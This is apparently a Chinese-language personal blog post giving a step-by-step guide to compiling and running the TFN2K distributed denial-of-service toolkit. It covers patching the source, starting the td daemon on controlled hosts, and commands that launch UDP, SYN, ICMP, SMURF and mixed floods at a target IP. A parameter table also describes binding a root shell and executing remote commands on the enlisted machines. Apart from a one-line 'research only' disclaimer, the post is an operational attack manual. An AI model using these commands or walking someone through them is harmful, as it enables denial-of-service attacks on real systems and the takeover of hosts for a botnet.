本站只做技術研究不提供檔案下載請自行上網搜尋

tar zxvf tfn2k.tgz

vi /src/ip.h

注釋掉以下部分,否則編譯出錯。

 /*struct in_addr
{
unsigned long int s_addr;
};*/

編譯

cd tfn2k/src

make

在提示設置密碼後,會生成 tfn 和 td 兩個文件,其中 tfn 是控制段,td 是守護進程。

被控端要先跑td 服務是td-deamon

/root/tfn2k/src/td

hosts.txt可加入多個被控端ip

服務測試/root/tfn2k/src/tfn -f hosts.txt -c 10 "mkdir testaa" 每台被控端機器都會產生資料夾testaa
主控指揮./root/tfn2k/src/tfn -f hosts.txt -c 6 -i x.x.x.x(目標ip) 輸入設置密碼


停止/root/tfn2k/src/tfn -f hosts.txt -c 0

被攻擊端可以看到有大量ip的icmp封包

其它測試指令範例

cd /root/tfn2k/src/
/root/tfn2k/src/tfn -f hosts.txt -c 10 -i "mkdir testaa"
/root/tfn2k/src/tfn -f hosts.txt -c 4,5,6,7,8,9 -i x.x.x.x
/root/tfn2k/src/tfn -f hosts.txt -c 0
/root/tfn2k/src/tfn -f hosts.txt -c 6 -i x.x.x.x
/root/tfn2k/src/tfn -f hosts.txt -c 6 x.x.x.x

參數說明

ID 1 -反欺騙級:服務器產生的DoS攻擊總是來源虛假的源地址。通過這個命令,你可以控制IP地址的哪些部分是虛假的,哪些部分是真實的IP。 
ID 2 -改變包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用最小包。你可以通過改變每個包的有效載荷的字節增加它的大小。 
ID 3 - 綁定root shell:啟動一個會話服務,然你連接一個指定端口就可以得到一個root shell。 
ID 4 - UDP flood 攻擊:這個攻擊是利用這樣一個事實:每個udp包被送往一個關閉的端口,這樣就會有一個ICMP不可到達的信息返回,增加了攻擊的能力。 
ID5 - SYN flood 攻擊:這個攻擊有規律的送虛假的連接請求。結果會是目標端口拒絕服務,添瞞TCP連接表,通過對不存在主機的TCP/RST響應增加攻擊潛力。 
ID 6 - ICMP響應(ping)攻擊:這個攻擊發送虛假地址的ping請求,目標主機會回送相同大小的響應包。 
ID 7 - SMURF 攻擊:用目標主機的地址發送ping請求以廣播擴大,這樣目標主機將得到回復一個多倍的回復。 
ID 8 - MIX攻擊:按照1:1:1的關系交替的發送udp,syn,icmp包,這樣就可以對付路由器,其它包轉發設備,NIDS,sniffers等。 
ID 9 -TARGA3攻擊 
ID 10 - 遠程命令執行:給予單路在服務器上執行大量遠程命令的機會。

點閱: 457

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料